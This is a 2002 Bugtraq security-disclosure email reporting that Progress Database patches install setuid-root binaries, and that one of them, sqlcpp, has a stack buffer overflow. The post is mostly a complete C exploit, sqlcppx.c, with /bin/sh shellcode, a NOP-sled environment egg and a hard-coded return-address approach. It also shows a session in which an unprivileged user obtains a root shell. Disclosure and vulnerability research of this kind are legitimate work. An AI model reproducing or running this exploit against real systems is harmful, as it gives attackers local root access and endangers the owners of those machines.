Date: Mon, 01 Apr 2002 12:28:55 -0500
From: KF <dotslash@snosoft.com>
To: bugtraq <bugtraq@security-focus.com>,
Subject: Progress Setuid patch Installs (Happy Easter or April fools to Progress)
--------------080503070201000100070106
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
http://online.securityfocus.com/archive/82/263602
I sent this out a week or so ago to vuln-dev ... there was never a bid
number written up on it so I figured I would stress the problem again. I
mailed this to Progress tech support and they failed to respond as usual
so maybe this will get them in gear.
Its not like I haven't told them how to fix this at least once.
[root@ghetto finished]# ls -al /usr/dlc/bin/sqlcpp
-rwsrwsr-x 1 root root 2220918 Oct 23 08:59 /usr/dlc/bin/sqlcpp
Progress likes to include alot of suids in their patches... and they
GIVE them to you even if you don't use the software.
sqlcpp was NOT part of my install until I patched my box. Thanks for the
root security hole guys and STOP using p_stcopy()!
[root@localhost root]# tar tzvf 91C09.tar.Z | grep ws
-rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil
-rwsrwxr-x patchbld/rdl 1124797 2002-02-26 08:16:51 bin/_mprosrv
-rwsrwxr-x patchbld/rdl 1540931 2002-02-26 08:16:52 bin/_mprshut
-rwsrwxr-x patchbld/rdl 413694 2002-02-26 08:16:53 bin/_orasrv
-rwsrwxr-x patchbld/rdl 4770560 2002-02-26 08:16:56 bin/_proapsv
-rwsrwxr-x patchbld/rdl 268161 2002-02-26 08:16:57 bin/_probrkr
-rwsrwxr-x patchbld/rdl 4260172 2002-02-26 08:17:00 bin/_probuild
-rwsrwxr-x patchbld/rdl 4614600 2002-02-26 08:17:05 bin/_progres
-rwsrwxr-x patchbld/rdl 311275 2002-02-26 08:17:06 bin/_prooibk
-rwsrwxr-x patchbld/rdl 2220962 2002-02-26 08:17:08 bin/_prooidv
-rwsrwxr-x patchbld/rdl 1692954 2002-02-26 08:17:10 bin/_proutil
-rwsrwxr-x patchbld/rdl 1126861 2002-02-26 08:17:12 bin/_rfutil
-rwsrwxr-x patchbld/rdl 4580488 2002-02-26 08:17:26 bin/orarx
-rwsrwxr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp
Much thanks to "The Itch" and his great work.
[dotslash@ghetto misc]$ id
uid=501(dotslash) gid=501(dotslash) groups=501(dotslash)
[dotslash@ghetto misc]$ cc -o sqlcppx sqlcppx.c
[dotslash@ghetto misc]$ ./sqlcppx
/usr/dlc/bin/sqlcpp
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org
Using return address: 0xbffffae4
Using buffersize : 60
sh-2.05# id
uid=0(root) gid=501(dotslash) groups=501(dotslash)
-KF
--------------080503070201000100070106
Content-Type: text/plain;
name="sqlcppx.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="sqlcppx.c"
/*
* Yet another Progress Database exploit (version ??)
*
* The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
* Exploit coded up by The Itch / Promisc (http://www.promisc.org)
*
* This exploit was developed on the Snosoft vulnerability research machines
* mail dotslash@snosoft.com if you are interested in contributing research time
*
* - The Itch
* - itchie@promisc.org
*
* - Technical details concerning the exploit -
*
* 1). Buffer overflow occurs after writing more then 56 bytes into the buffer at the command line
* (56 to overwrite ebp, 60 to overwrite eip).
* 2). If you write more then 65 bytes, other frames will be overwritten afterwards and will mess up
* your flow of arbitrary code execution.
*/
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 60
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(int argc, char *argv[])
{
char *buff;
char *egg;
char *ptr;
long *addr_ptr;
long addr;
int bsize = DEFAULT_BUFFER_SIZE;
int eggsize = DEFAULT_EGG_SIZE;
int i;
int get_sp = (int)&get_sp;
if(argc > 1) { bsize = atoi(argv[1]); }
if(!(buff = malloc(bsize)))
{
printf("unable to allocate memory for %d bytes\n", bsize);
exit(1);
}
if(!(egg = malloc(eggsize)))
{
printf("unable to allocate memory for %d bytes\n", eggsize);
exit(1);
}
printf("/usr/dlc/bin/sqlcpp\n");
printf("Vulnerability found by KF / http://www.snosoft.com\n");
printf("Coded by The Itch / http://www.promisc.org\n\n");
printf("Using return address: 0x%x\n", get_sp);
printf("Using buffersize : %d\n", bsize);
ptr = buff;
addr_ptr = (long *) ptr;
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
{
*(ptr++) = NOP;
}
for(i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
putenv(egg);
execl("/usr/dlc/sqlcpp", "sqlcpp", buff, 0);
return 0;
}
--------------080503070201000100070106--
